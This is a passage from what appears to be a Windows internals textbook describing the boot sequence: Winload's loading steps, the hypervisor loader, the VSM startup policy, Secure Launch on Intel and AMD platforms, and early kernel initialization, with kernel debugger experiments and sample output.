OslpMain. The boot library, at the time of this writing, supports two different
execution contexts:
■ Firmware context means that the paging is disabled. Actually, it’s not
disabled but it’s provided by the firmware that performs the one-to-
one mapping of physical addresses, and only firmware services are
used for memory management. Windows uses this execution context
in the Boot Manager.
■ Application context means that the paging is enabled and provided by
the OS. This is the context used by the Windows Loader.
The Boot Manager, just before transferring the execution to the OS loader,
creates and initializes the four-level x64 page table hierarchy that will be
used by the Windows kernel, creating only the self-map and the identity
mapping entries. OslMain switches to the Application execution context, just
before starting. The OslPrepareTarget routine captures the boot/shutdown
status of the last boot, reading from the bootstat.dat file located in the system
root directory.
When the last boot has failed more than twice, it returns to the Boot
Manager for starting the Recovery environment. Otherwise, it reads in the
SYSTEM registry hive, \Windows\System32\Config\System, so that it can
determine which device drivers need to be loaded to accomplish the boot. (A
hive is a file that contains a registry subtree. More details about the registry
were provided in Chapter 10.) Then it initializes the BGFX display library
(drawing the first background image) and shows the Advanced Options menu
if needed (refer to the section “The boot menu” earlier in this chapter). One
of the most important data structures needed for the NT kernel boot, the
Loader Block, is allocated and filled with basic information, like the system
hive base address and size, a random entropy value (queried from the TPM if
possible), and so on.
OslInitializeLoaderBlock contains code that queries the system’s ACPI
BIOS to retrieve basic device and configuration information (including event
time and date information stored in the system’s CMOS). This information is
gathered into internal data structures that will be stored under the
HKLM\HARDWARE\DESCRIPTION registry key later in the boot. This is
mostly a legacy key that exists only for compatibility reasons. Today, it’s the
Plug and Play manager database that stores the true information on hardware.
Next, Winload begins loading the files from the boot volume needed to
start the kernel initialization. The boot volume is the volume that corresponds
to the partition on which the system directory (usually \Windows) of the
installation being booted is located. Winload follows these steps:
1.
Determines whether the hypervisor or the Secure Kernel needs to be
loaded (through the hypervisorlaunchtype BCD option and the VSM
policy); if so, it starts phase 0 of the hypervisor setup. Phase 0 pre-
loads the HV loader module (Hvloader.dll) into RAM memory and
executes its HvlLoadHypervisor initialization routine. The latter loads
and maps the hypervisor image (Hvix64.exe, Hvax64.exe, or
Hvaa64.exe, depending on the architecture) and all its dependencies
in memory.
2.
Enumerates all the firmware-enumerable disks and attaches the list in
the Loader Parameter Block. Furthermore, loads the Synthetic Initial
Machine Configuration hive (Imc.hiv) if specified by the
configuration data and attaches it to the loader block.
3.
Initializes the kernel Code Integrity module (CI.dll) and builds the CI
Loader block. The Code Integrity module will be then shared between
the NT kernel and Secure Kernel.
4.
Processes any pending firmware updates. (Windows 10 supports
firmware updates distributed through Windows Update.)
5.
Loads the appropriate kernel and HAL images (Ntoskrnl.exe and
Hal.dll by default). If Winload fails to load either of these files, it
prints an error message. Before properly loading the two modules’
dependencies, Winload validates their contents against their digital
certificates and loads the API Set Schema system file. In this way, it
can process the API Set imports.
6.
Initializes the debugger, loading the correct debugger transport.
7.
Loads the CPU microcode update module (Mcupdate.dll), if
applicable.
8.
OslpLoadAllModules finally loads the modules on which the NT
kernel and HAL depend, ELAM drivers, core extensions, TPM
drivers, and all the remaining boot drivers (respecting the load order
—the file system drivers are loaded first). Boot device drivers are
drivers necessary to boot the system. The configuration of these
drivers is stored in the SYSTEM registry hive. Every device driver
has a registry subkey under
HKLM\SYSTEM\CurrentControlSet\Services. For example, Services
has a subkey named rdyboost for the ReadyBoost driver, which you
can see in Figure 12-8 (for a detailed description of the Services
registry entries, see the section “Services” in Chapter 10). All the boot
drivers have a start value of SERVICE_BOOT_START (0).
9.
At this stage, to properly allocate physical memory, Winload is still
using services provided by the EFI Firmware (the AllocatePages boot
service routine). The virtual address translation is instead managed by
the boot library, running in the Application execution context.
Figure 12-8 ReadyBoost driver service settings.
10.
Reads in the NLS (National Language System) files used for
internationalization. By default, these are l_intl.nls, C_1252.nls, and
C_437.nls.
11.
If the evaluated policies require the startup of the VSM, executes
phase 0 of the Secure Kernel setup, which resolves the locations of
the VSM Loader support routines (exported by the Hvloader.dll
module), and loads the Secure Kernel module (Securekernel.exe) and
all of its dependencies.
12.
For the S edition of Windows, determines the minimum user-mode
configurable code integrity signing level for the Windows
applications.
13.
Calls the OslArchpKernelSetupPhase0 routine, which performs the
memory steps required for kernel transition, like allocating a GDT,
IDT, and TSS; mapping the HAL virtual address space; and allocating
the kernel stacks, shared user page, and USB legacy handoff. Winload
uses the UEFI GetMemoryMap facility to obtain a complete system
physical memory map and maps each physical page that belongs to
EFI Runtime Code/Data into virtual memory space. The complete
physical map will be passed to the OS kernel.
14.
Executes phase 1 of VSM setup, copying all the needed ACPI tables
from VTL0 to VTL1 memory. (This step also builds the VTL1 page
tables.)
15.
The virtual memory translation module is completely functional, so
Winload calls the ExitBootServices UEFI function to get rid of the
firmware boot services and remaps all the remaining Runtime UEFI
services into the created virtual address space, using the
SetVirtualAddressMap UEFI runtime function.
16.
If needed, launches the hypervisor and the Secure Kernel (exactly in
this order). If successful, the execution control returns to Winload in
the context of the Hyper-V Root Partition. (Refer to Chapter 9,
“Virtualization technologies,” for details about Hyper-V.)
17.
Transfers the execution to the kernel through the
OslArchTransferToKernel routine.
Booting from iSCSI
Internet SCSI (iSCSI) devices are a kind of network-attached storage in that
remote physical disks are connected to an iSCSI Host Bus Adapter (HBA) or
through Ethernet. These devices, however, are different from traditional
network-attached storage (NAS) because they provide block-level access to
disks, unlike the logical-based access over a network file system that NAS
employs. Therefore, an iSCSI-connected disk appears as any other disk drive,
both to the boot loader and to the OS, as long as the Microsoft iSCSI Initiator
is used to provide access over an Ethernet connection. By using iSCSI-
enabled disks instead of local storage, companies can save on space, power
consumption, and cooling.
Although Windows has traditionally supported booting only from locally
connected disks or network booting through PXE, modern versions of
Windows are also capable of natively booting from iSCSI devices through a
mechanism called iSCSI Boot. As shown in Figure 12-9, the boot loader
(Winload.efi) detects whether the system supports iSCSI boot devices
reading the iSCSI Boot Firmware Table (iBFT) that must be present in
physical memory (typically exposed through ACPI). Thanks to the iBFT
table, Winload knows the location, path, and authentication information for
the remote disk. If the table is present, Winload opens and loads the network
interface driver provided by the manufacturer, which is marked with the
CM_SERVICE_NETWORK_BOOT_LOAD (0x1) boot flag.
Figure 12-9 iSCSI boot architecture.
Additionally, Windows Setup also has the capability of reading this table
to determine bootable iSCSI devices and allow direct installation on such a
device, such that no imaging is required. In combination with the Microsoft
iSCSI Initiator, this is all that’s required for Windows to boot from iSCSI.
The hypervisor loader
The hypervisor loader is the boot module (its file name is Hvloader.dll) used
to properly load and start the Hyper-V hypervisor and the Secure Kernel. For
a complete description of Hyper-V and the Secure Kernal, refer to Chapter 9.
The hypervisor loader module is deeply integrated in the Windows Loader
and has two main goals:
■ Detect the hardware platform; load and start the proper version of the
Windows Hypervisor (Hvix64.exe for Intel Systems, Hvax64.exe for
AMD systems and Hvaa64.exe for ARM64 systems).
■ Parse the Virtual Secure Mode (VSM) policy; load and start the
Secure Kernel.
In Windows 8, this module was an external executable loaded by Winload
on demand. At that time the only duty of the hypervisor loader was to load
and start Hyper-V. With the introduction of the VSM and Trusted Boot, the
architecture has been redesigned for a better integration of each component.
As previously mentioned, the hypervisor setup has two different phases.
The first phase begins in Winload, just after the initialization of the NT
Loader Block. The HvLoader detects the target platform through some
CPUID instructions, copies the UEFI physical memory map, and discovers
the IOAPICs and IOMMUs. Then HvLoader loads the correct hypervisor
image (and all the dependencies, like the Debugger transport) in memory and
checks whether the hypervisor version information matches the one expected.
(This explains why the HvLoader couldn’t start a different version of Hyper-
V.) HvLoader at this stage allocates the hypervisor loader block, an
important data structure used for passing system parameters between
HvLoader and the hypervisor itself (similar to the Windows loader block).
The most important step of phase 1 is the construction of the hypervisor page
tables hierarchy. The just-born page tables include only the mapping of the
hypervisor image (and its dependencies) and the system physical pages
below the first megabyte. The latter are identity-mapped and are used by the
startup transitional code (this concept is explained later in this section).
The second phase is initiated in the final stages of Winload: the UEFI
firmware boot services have been discarded, so the HvLoader code copies the
physical address ranges of the UEFI Runtime Services into the hypervisor
loader block; captures the processor state; disables the interrupts, the
debugger, and paging; and calls
HvlpTransferToHypervisorViaTransitionSpace to transfer the code execution
to the below 1 MB physical page. The code located here (the transitional
code) can switch the page tables, re-enable paging, and move to the
hypervisor code (which actually creates the two different address spaces).
After the hypervisor starts, it uses the saved processor context to properly
yield back the code execution to Winload in the context of a new virtual
machine, called root partition (more details available in Chapter 9).
The launch of the virtual secure mode is divided in three different phases
because some steps are required to be done after the hypervisor has started.
1.
The first phase is very similar to the first phase in the hypervisor
setup. Data is copied from the Windows loader block to the just-
allocated VSM loader block; the master key, IDK key, and
Crashdump key are generated; and the SecureKernel.exe module is
loaded into memory.
2.
The second phase is initiated by Winload in the late stages of
OslPrepareTarget, where the hypervisor has been already initialized
but not launched. Similar to the second phase of the hypervisor setup,
the UEFI runtime services physical address ranges are copied into the
VSM loader block, along with ACPI tables, code integrity data, the
complete system physical memory map, and the hypercall code page.
Finally, the second phase constructs the protected page tables
hierarchy used for the protected VTL1 memory space (using the
OslpVsmBuildPageTables function) and builds the needed GDT.
3.
The third phase is the final “launch” phase. The hypervisor has
already been launched. The third phase performs the final checks.
(Checks such as whether an IOMMU is present, and whether the root
partition has VSM privileges. The IOMMU is very important for
VSM. Refer to Chapter 9 for more information.) This phase also sets
the encrypted hypervisor crash dump area, copies the VSM
encryption keys, and transfers execution to the Secure Kernel entry
point (SkiSystemStartup). The Secure Kernel entry point code runs in
VTL 0. VTL 1 is started by the Secure Kernel code in later stages
through the HvCallEnablePartitionVtl hypercall. (Read Chapter 9 for
more details.)
VSM startup policy
At startup time, the Windows loader needs to determine whether it has to
launch the Virtual Secure Mode (VSM). To defeat all the malware attempts
to disable this new layer of protection, the system uses a specific policy to
seal the VSM startup settings. In the default configurations, at the first boot
(after the Windows Setup application has finished to copy the Windows
files), the Windows Loader uses the OslSetVsmPolicy routine to read and seal
the VSM configuration, which is stored in the VSM root registry key
HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard.
VSM can be enabled by different sources:
■ Device Guard Scenarios Each scenario is stored as a subkey in the
VSM root key. The Enabled DWORD registry value controls whether
a scenario is enabled. If one or more scenarios are active, the VSM is
enabled.
■ Global Settings Stored in the EnableVirtualizationBasedSecurity
registry value.
■ HVCI Code Integrity policies Stored in the code integrity policy file
(Policy.p7b).
Also, by default, VSM is automatically enabled when the hypervisor is
enabled (except if the HyperVVirtualizationBasedSecurityOptOut registry
value exists).
Every VSM activation source specifies a locking policy. If the locking
mode is enabled, the Windows loader builds a Secure Boot variable, called
VbsPolicy, and stores in it the VSM activation mode and the platform
configuration. Part of the VSM platform configuration is dynamically
generated based on the detected system hardware, whereas another part is
read from the RequirePlatformSecurityFeatures registry value stored in the
VSM root key. The Secure Boot variable is read at every subsequent boot;
the configuration stored in the variable always replaces the configuration
located in the Windows registry.
In this way, even if malware can modify the Windows Registry to disable
VSM, Windows will simply ignore the change and keep the user
environment secure. Malware won’t be able to modify the VSM Secure Boot
variable because, per Secure Boot specification, only a new variable signed
by a trusted digital signature can modify or delete the original one. Microsoft
provides a special signed tool that could disable the VSM protection. The
tool is a special EFI boot application, which sets another signed Secure Boot
variable called VbsPolicyDisabled. This variable is recognized at startup time
by the Windows Loader. If it exists, Winload deletes the VbsPolicy secure
variable and modifies the registry to disable VSM (modifying both the global
settings and each Scenario activation).
EXPERIMENT: Understanding the VSM policy
In this experiment, you examine how the Secure Kernel startup is
resistant to external tampering. First, enable Virtualization Based
Security (VBS) in a compatible edition of Windows (usually the
Pro and Business editions work well). On these SKUs, you can
quickly verify whether VBS is enabled using Task Manager; if
VBS is enabled, you should see a process named Secure System on
the Details tab. Even if it’s already enabled, check that the UEFI
lock is enabled. Type Edit Group policy (or gpedit.msc) in the
Start menu search box, and start the Local Policy Group Editor
snap-in. Navigate to Computer Configuration, Administrative
Templates, System, Device Guard, and double-click Turn On
Virtualization Based Security. Make sure that the policy is set to
Enabled and that the options are set as in the following figure:
Make sure that Secure Boot is enabled (you can use the System
Information utility or your system BIOS configuration tool to
confirm the Secure Boot activation), and restart the system. The
Enabled With UEFI Lock option provides antitampering even in an
Administrator context. After your system is restarted, disable VBS
through the same Group policy editor (make sure that all the
settings are disabled) and by deleting all the registry keys and
values located in
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control
\DeviceGuard (setting them to 0 produces the same effect). Use the
registry editor to properly delete all the values:
Disable the hypervisor by running bcdedit /set {current}
hypervisorlaunchtype off from an elevated command prompt.
Then restart your computer again. After the system is restarted,
even if VBS and hypervisor are expected to be turned off, you
should see that the Secure System and LsaIso process are still
present in the Task Manager. This is because the UEFI secure
variable VbsPolicy still contains the original policy, so a malicious
program or a user could not easily disable the additional layer of
protection. To properly confirm this, open the system event viewer
by typing eventvwr and navigate to Windows Logs, System. If you
scroll between the events, you should see the event that describes
the VBS activation type (the event has Kernel-Boot source).
VbsPolicy is a Boot Services–authenticated UEFI variable, so
this means it’s not visible after the OS switches to Runtime mode.
The UefiTool utility, used in the previous experiment, is not able to
show these kinds of variables. To properly examine the VBSpolicy
variable content, restart your computer again, disable Secure Boot,
and use the Efi Shell. The Efi Shell (found in this book’s
downloadable resources, or downloadable from
https://github.com/tianocore/edk2/tree/UDK2018/ShellBinPkg/Uefi
Shell/X64) must be copied into a FAT32 USB stick in a file named
bootx64.efi and located into the efi\boot path. At this point, you
will be able to boot from the USB stick, which will launch the Efi
Shell. Run the following command:
Click here to view code image
dmpstore VbsPolicy -guid 77FA9ABD-0359-4D32-BD60-
28F4E78F784B
(77FA9ABD-0359-4D32-BD60-28F4E78F784B is the GUID of the
Secure Boot private namespace.)
The Secure Launch
If Trusted Execution is enabled (through a specific feature value in the VSM
policy) and the system is compatible, Winload enables a new boot path that’s
a bit different compared to the normal one. This new boot path is called
Secure Launch. Secure Launch implements the Intel Trusted Boot (TXT)
technology (or SKINIT in AMD64 machines). Trusted Boot is implemented
in two components: boot library and the TcbLaunch.exe file. The Boot
library, at initialization time, detects that Trusted Boot is enabled and
registers a boot callback that intercepts different events: Boot application
starting, hash calculation, and Boot application ending. The Windows loader,
in the early stages, executes to the three stages of Secure Launch Setup (from
now on we call the Secure Launch setup the TCB setup) instead of loading
the hypervisor.
As previously discussed, the final goal of Secure Launch is to start a
secure boot sequence, where the CPU is the only root of trust. To do so, the
system needs to get rid of all the firmware dependencies. Windows achieves
this by creating a RAM disk formatted with the FAT file system, which
includes Winload, the hypervisor, the VSM module, and all the boot OS
components needed to start the system. The windows loader (Winload) reads
TcbLaunch.exe from the system boot disk into memory, using the
BlImgLoadBootApplication routine. The latter triggers the three events that
the TCB boot callback manages. The callback first prepares the Measured
Launch Environment (MLE) for launch, checking the ACM modules, ACPI
table, and mapping the required TXT regions; then it replaces the boot
application entry point with a special TXT MLE routine.
The Windows Loader, in the latest stages of the OslExecuteTransition
routine, doesn’t start the hypervisor launch sequence. Instead, it transfers the
execution to the TCB launch sequence, which is quite simple. The TCB boot
application is started with the same BlImgStartBootApplication routine
described in the previous paragraph. The modified boot application entry
point calls the TXT MLE launch routine, which executes the
GETSEC(SENTER) TXT instruction. This instruction measures the
TcbLaunch.exe executable in memory (TBOOT module) and if the
measurement succeeds, the MLE launch routine transfers the code execution
to the real boot application entry point (TcbMain).
TcbMain function is the first code executed in the Secure Launch
environment. The implementation is simple: reinitialize the Boot Library,
register an event to receive virtualization launch/resume notification, and call
TcbLoadEntry from the Tcbloader.dll module located in the secure RAM
disk. The Tcbloader.dll module is a mini version of the trusted Windows
loader. Its goal is to load, verify, and start the hypervisor; set up the
Hypercall page; and launch the Secure Kernel. The Secure Launch at this
stage ends because the hypervisor and Secure Kernel take care of the
verification of the NT kernel and other modules, providing the chain of trust.
Execution then returns to the Windows loader, which moves to the Windows
kernel through the standard OslArchTransferToKernel routine.
Figure 12-10 shows a scheme of Secure Launch and all its involved
components. The user can enable the Secure Launch by using the Local
Group policy editor (by tweaking the Turn On Virtualization Based Security
setting, which is under Computer Configuration, Administrative Templates,
System, Device Guard).
Figure 12-10 The Secure Launch scheme. Note that the hypervisor and
Secure Kernel start from the RAM disk.
Note
The ACM modules of Trusted Boot are provided by Intel and are chipset-
dependent. Most of the TXT interface is memory mapped in physical
memory. This means that the Hv Loader can access even the SINIT
region, verify the SINIT ACM version, and update it if needed. Windows
achieves this by using a special compressed WIM file (called Tcbres.wim)
that contains all the known SINIT ACM modules for each chipset. If
needed, the MLE preparation phase opens the compressed file, extracts
the right binary module, and replaces the contents of the original SINIT
firmware in the TXT region. When the Secure Launch procedure is
invoked, the CPU loads the SINIT ACM into secure memory, verifies the
integrity of the digital signature, and compares the hash of its public key
with the one hardcoded into the chipset.
Secure Launch on AMD platforms
Although Secure Launch is supported on Intel machines thanks to TXT, the
Windows 10 Spring 2020 update also supports SKINIT, which is a similar
technology designed by AMD for the verifiable startup of trusted software,
starting with an initially untrusted operating mode.
SKINIT has the same goal as Intel TXT and is used for the Secure Launch
boot flow. It’s different from the latter, though: The base of SKINIT is a
small type of software called secure loader (SL), which in Windows is
implemented in the amdsl.bin binary included in the resource section of the
Amddrtm.dll library provided by AMD. The SKINIT instruction reinitializes
the processor to establish a secure execution environment and starts the
execution of the SL in a way that can’t be tampered with. The secure loader
lives in the Secure Loader Block, a 64-Kbyte structure that is transferred to
the TPM by the SKINIT instruction. The TPM measures the integrity of the
SL and transfers execution to its entry point.
The SL validates the system state, extends measurements into the PCR,
and transfers the execution to the AMD MLE launch routine, which is
located in a separate binary included in the TcbLaunch.exe module. The
MLE routine initializes the IDT and GDT and builds the page table for
switching the processor to long mode. (The MLE in AMD machines are
executed in 32-bit protected mode, with a goal of keeping the code in the
TCB as small as possible.) It finally jumps back in the TcbLaunch, which, as
for Intel systems, reinitializes the Boot Library, registers an event to receive
virtualization launch/resume notification, and calls TcbLoadEntry from the
tcbloader.dll module. From now on, the boot flow is identical to the Secure
Launch implementation for the Intel systems.
Initializing the kernel and executive subsystems
When Winload calls Ntoskrnl, it passes a data structure called the Loader
Parameter block. The Loader Parameter block contains the system and boot
partition paths, a pointer to the memory tables Winload generated to describe
the system physical memory, a physical hardware tree that is later used to
build the volatile HARDWARE registry hive, an in-memory copy of the
SYSTEM registry hive, and a pointer to the list of boot drivers Winload
loaded. It also includes various other information related to the boot
processing performed until this point.
EXPERIMENT: Loader Parameter block
While booting, the kernel keeps a pointer to the Loader Parameter
block in the KeLoaderBlock variable. The kernel discards the
parameter block after the first boot phase, so the only way to see
the contents of the structure is to attach a kernel debugger before
booting and break at the initial kernel debugger breakpoint. If
you’re able to do so, you can use the dt command to dump the
block, as shown:
Click here to view code image
kd> dt poi(nt!KeLoaderBlock) nt!LOADER_PARAMETER_BLOCK
+0x000 OsMajorVersion : 0xa
+0x004 OsMinorVersion : 0
+0x008 Size : 0x160
+0x00c OsLoaderSecurityVersion : 1
+0x010 LoadOrderListHead : _LIST_ENTRY [
0xfffff800`2278a230 - 0xfffff800`2288c150 ]
+0x020 MemoryDescriptorListHead : _LIST_ENTRY [
0xfffff800`22949000 - 0xfffff800`22949de8 ]
+0x030 BootDriverListHead : _LIST_ENTRY [
0xfffff800`22840f50 - 0xfffff800`2283f3e0 ]
+0x040 EarlyLaunchListHead : _LIST_ENTRY [
0xfffff800`228427f0 - 0xfffff800`228427f0 ]
+0x050 CoreDriverListHead : _LIST_ENTRY [
0xfffff800`228429a0 - 0xfffff800`228405a0 ]
+0x060 CoreExtensionsDriverListHead : _LIST_ENTRY [
0xfffff800`2283ff20 - 0xfffff800`22843090 ]
+0x070 TpmCoreDriverListHead : _LIST_ENTRY [
0xfffff800`22831ad0 - 0xfffff800`22831ad0 ]
+0x080 KernelStack : 0xfffff800`25f5e000
+0x088 Prcb : 0xfffff800`22acf180
+0x090 Process : 0xfffff800`23c819c0
+0x098 Thread : 0xfffff800`23c843c0
+0x0a0 KernelStackSize : 0x6000
+0x0a4 RegistryLength : 0xb80000
+0x0a8 RegistryBase : 0xfffff800`22b49000 Void
+0x0b0 ConfigurationRoot : 0xfffff800`22783090
_CONFIGURATION_COMPONENT_DATA
+0x0b8 ArcBootDeviceName : 0xfffff800`22785290
"multi(0)disk(0)rdisk(0)partition(4)"
+0x0c0 ArcHalDeviceName : 0xfffff800`22785190
"multi(0)disk(0)rdisk(0)partition(2)"
+0x0c8 NtBootPathName : 0xfffff800`22785250
"\WINDOWS\"
+0x0d0 NtHalPathName : 0xfffff800`22782bd0 "\"
+0x0d8 LoadOptions : 0xfffff800`22772c80
"KERNEL=NTKRNLMP.EXE NOEXECUTE=OPTIN
HYPERVISORLAUNCHTYPE=AUTO
DEBUG ENCRYPTION_KEY=**** DEBUGPORT=NET
HOST_IP=192.168.18.48
HOST_PORT=50000 NOVGA"
+0x0e0 NlsData : 0xfffff800`2277a450
_NLS_DATA_BLOCK
+0x0e8 ArcDiskInformation : 0xfffff800`22785e30
_ARC_DISK_INFORMATION
+0x0f0 Extension : 0xfffff800`2275cf90
_LOADER_PARAMETER_EXTENSION
+0x0f8 u : <unnamed-tag>
+0x108 FirmwareInformation :
_FIRMWARE_INFORMATION_LOADER_BLOCK
+0x148 OsBootstatPathName : (null)
+0x150 ArcOSDataDeviceName : (null)
+0x158 ArcWindowsSysPartName : (null)
Additionally, you can use the !loadermemorylist command on
the MemoryDescriptorListHead field to dump the physical memory
ranges:
Click here to view code image
kd> !loadermemorylist 0xfffff800`22949000
Base Length Type
0000000001 0000000005 (26) HALCachedMemory ( 20 Kb )
0000000006 000000009a ( 5) FirmwareTemporary ( 616 Kb )
...
0000001304 0000000001 ( 7) OsloaderHeap ( 4 Kb )
0000001305 0000000081 ( 5) FirmwareTemporary ( 516 Kb )
0000001386 000000001c (20) MemoryData ( 112 Kb )
...
0000001800 0000000b80 (19) RegistryData ( 11 Mb
512 Kb )
0000002380 00000009fe ( 9) SystemCode ( 9 Mb
1016 Kb )
0000002d7e 0000000282 ( 2) Free ( 2 Mb 520
Kb )
0000003000 0000000391 ( 9) SystemCode ( 3 Mb 580
Kb )
0000003391 0000000068 (11) BootDriver ( 416 Kb )
00000033f9 0000000257 ( 2) Free ( 2 Mb 348
Kb )
0000003650 00000008d2 ( 5) FirmwareTemporary ( 8 Mb 840
Kb )
000007ffc9 0000000026 (31) FirmwareData ( 152 Kb )
000007ffef 0000000004 (32) FirmwareReserved ( 16 Kb )
000007fff3 000000000c ( 6) FirmwarePermanent ( 48 Kb )
000007ffff 0000000001 ( 5) FirmwareTemporary ( 4 Kb )
NumberOfDescriptors: 90
Summary
Memory Type Pages
Free 000007a89c ( 501916) ( 1 Gb 936
Mb 624 Kb )
LoadedProgram 0000000370 ( 880) ( 3 Mb 448
Kb )
FirmwareTemporary 0000001fd4 ( 8148) ( 31 Mb 848
Kb )
FirmwarePermanent 000000030e ( 782) ( 3 Mb 56 Kb
)
OsloaderHeap 0000000275 ( 629) ( 2 Mb 468
Kb )
SystemCode 0000001019 ( 4121) ( 16 Mb 100
Kb )
BootDriver 000000115a ( 4442) ( 17 Mb 360
Kb )
RegistryData 0000000b88 ( 2952) ( 11 Mb 544
Kb )
MemoryData 0000000098 ( 152) ( 608 Kb )
NlsData 0000000023 ( 35) ( 140 Kb )
HALCachedMemory 0000000005 ( 5) ( 20 Kb )
FirmwareCode 0000000008 ( 8) ( 32 Kb )
FirmwareData 0000000075 ( 117) ( 468 Kb )
FirmwareReserved 0000000044 ( 68) ( 272 Kb )
========== ==========
Total 000007FFDF ( 524255) = ( ~2047 Mb )
The Loader Parameter extension can show useful information
about the system hardware, CPU features, and boot type:
Click here to view code image
kd> dt poi(nt!KeLoaderBlock) nt!LOADER_PARAMETER_BLOCK
Extension
+0x0f0 Extension : 0xfffff800`2275cf90
_LOADER_PARAMETER_EXTENSION
kd> dt 0xfffff800`2275cf90 _LOADER_PARAMETER_EXTENSION
nt!_LOADER_PARAMETER_EXTENSION
+0x000 Size : 0xc48
+0x004 Profile : _PROFILE_PARAMETER_BLOCK
+0x018 EmInfFileImage : 0xfffff800`25f2d000 Void
...
+0x068 AcpiTable : (null)
+0x070 AcpiTableSize : 0
+0x074 LastBootSucceeded : 0y1
+0x074 LastBootShutdown : 0y1
+0x074 IoPortAccessSupported : 0y1
+0x074 BootDebuggerActive : 0y0
+0x074 StrongCodeGuarantees : 0y0
+0x074 HardStrongCodeGuarantees : 0y0
+0x074 SidSharingDisabled : 0y0
+0x074 TpmInitialized : 0y0
+0x074 VsmConfigured : 0y0
+0x074 IumEnabled : 0y0
+0x074 IsSmbboot : 0y0
+0x074 BootLogEnabled : 0y0
+0x074 FeatureSettings : 0y0000000 (0)
+0x074 FeatureSimulations : 0y000000 (0)
+0x074 MicrocodeSelfHosting : 0y0
...
+0x900 BootFlags : 0
+0x900 DbgMenuOsSelection : 0y0
+0x900 DbgHiberBoot : 0y1
+0x900 DbgSoftRestart : 0y0
+0x908 InternalBootFlags : 2
+0x908 DbgUtcBootTime : 0y0
+0x908 DbgRtcBootTime : 0y1
+0x908 DbgNoLegacyServices : 0y0
Ntoskrnl then begins phase 0, the first of its two-phase initialization
process (phase 1 is the second). Most executive subsystems have an
initialization function that takes a parameter that identifies which phase is
executing.
During phase 0, interrupts are disabled. The purpose of this phase is to
build the rudimentary structures required to allow the services needed in
phase 1 to be invoked. Ntoskrnl’s startup function, KiSystemStartup, is called
in each system processor context (more details later in this chapter in the
“Kernel initialization phase 1” section). It initializes the processor boot
structures and sets up a Global Descriptor Table (GDT) and Interrupt
Descriptor Table (IDT). If called from the boot processor, the startup routine
initializes the Control Flow Guard (CFG) check functions and cooperates
with the memory manager to initialize KASLR. The KASLR initialization
should be done in the early stages of the system startup; in this way, the
kernel can assign random VA ranges for the various virtual memory regions
(such as the PFN database and system PTE regions; more details about
KASLR are available in the “Image randomization” section of Chapter 5,
Part 1). KiSystemStartup also initializes the kernel debugger, the XSAVE
processor area, and, where needed, KVA Shadow. It then calls
KiInitializeKernel. If KiInitializeKernel is running on the boot CPU, it
performs systemwide kernel initialization, such as initializing internal lists
and other data structures that all CPUs share. It builds and compacts the
System Service Descriptor table (SSDT) and calculates the random values for
the internal KiWaitAlways and KiWaitNever values, which are used for
kernel pointers encoding. It also checks whether virtualization has been
started; if it has, it maps the Hypercall page and starts the processor’s
enlightenments (more details about the hypervisor enlightenments are
available in Chapter 9).
KiInitializeKernel, if executed by compatible processors, has the important
role of initializing and enabling the Control Enforcement Technology (CET).
This hardware feature is relatively new, and basically implements a hardware
shadow stack, used to detect and prevent ROP attacks. The technology is
used for protecting both user-mode applications as well as kernel-mode
drivers (only when VSM is available). KiInitializeKernel initializes the Idle
process and thread and calls ExpInitializeExecutive. KiInitializeKernel and
ExpInitializeExecutive are normally executed on each system processor.
When executed by the boot processor, ExpInitializeExecutive relies on the
function responsible for orchestrating phase 0, InitBootProcessor, while
subsequent processors call only InitOtherProcessors.
Note
Return-oriented programming (ROP) is an exploitation technique in
which an attacker gains control of the call stack of a program with the
goal of hijacking its control flow and executes carefully chosen machine
instruction sequences, called “gadgets,” that are already present in the
machine’s memory. Chained together, multiple gadgets allow an attacker
to perform arbitrary operations on a machine.
InitBootProcessor starts by validating the boot loader. If the boot loader
version used to launch Windows doesn’t correspond to the right Windows
kernel, the function crashes the system with a
LOADER_BLOCK_MISMATCH bugcheck code (0x100). Otherwise, it
initializes the pool look-aside pointers for the initial CPU and checks for and
honors the BCD burnmemory boot option, where it discards the amount of
physical memory the value specifies. It then performs enough initialization of
the NLS files that were loaded by Winload (described earlier) to allow
Unicode to ANSI and OEM translation to work. Next, it continues by
initializing Windows Hardware Error Architecture (WHEA) and calling the
HAL function HalInitSystem, which gives the HAL a chance to gain system
control before Windows performs significant further initialization.
HalInitSystem is responsible for initializing and starting various components
of the HAL, like ACPI tables, debugger descriptors, DMA, firmware, I/O
MMU, System Timers, CPU topology, performance counters, and the PCI
bus. One important duty of HalInitSystem is to prepare each CPU interrupt
controller to receive interrupts and to configure the interval clock timer
interrupt, which is used for CPU time accounting. (See the section
“Quantum” in Chapter 4, “Threads,” in Part 1 for more on CPU time
accounting.)
When HalInitSystem exits, InitBootProcessor proceeds by computing the
reciprocal for clock timer expiration. Reciprocals are used for optimizing
divisions on most modern processors. They can perform multiplications
faster, and because Windows must divide the current 64-bit time value in
order to find out which timers need to expire, this static calculation reduces
interrupt latency when the clock interval fires. InitBootProcessor uses a
helper routine, CmInitSystem0, to fetch registry values from the control
vector of the SYSTEM hive. This data structure contains more than 150
kernel-tuning options that are part of the
HKLM\SYSTEM\CurrentControlSet\Control registry key, including
information such as the licensing data and version information for the
installation. All the settings are preloaded and stored in global variables.
InitBootProcessor then continues by setting up the system root path and
searching into the kernel image to find the crash message strings it displays
on blue screens, caching their location to avoid looking them up during a
crash, which could be dangerous and unreliable. Next, InitBootProcessor
initializes the timer subsystem and the shared user data page.
InitBootProcessor is now ready to call the phase 0 initialization routines
for the executive, Driver Verifier, and the memory manager. These
components perform the following initialization tasks:
1.
The executive initializes various internal locks, resources, lists, and
variables and validates that the product suite type in the registry is
valid, discouraging casual modification of the registry to “upgrade” to
an SKU of Windows that was not actually purchased. This is only one
of the many such checks in the kernel.
2.
Driver Verifier, if enabled, initializes various settings and behaviors
based on the current state of the system (such as whether safe mode is
enabled) and verification options. It also picks which drivers to target
for tests that target randomly chosen drivers.
3.
The memory manager constructs the page tables, PFN database, and
internal data structures that are necessary to provide basic memory
services. It also enforces the limit of the maximum supported amount
of physical memory and builds and reserves an area for the system
file cache. It then creates memory areas for the paged and nonpaged
pools (described in Chapter 5 in Part 1). Other executive subsystems,
the kernel, and device drivers use these two memory pools for
allocating their data structures. It finally creates the UltraSpace, a 16
TB region that provides support for fast and inexpensive page
mapping that doesn’t require TLB flushing.
Next, InitBootProcessor enables the hypervisor CPU dynamic partitioning
(if enabled and correctly licensed), and calls HalInitializeBios to set up the
old BIOS emulation code part of the HAL. This code is used to allow access
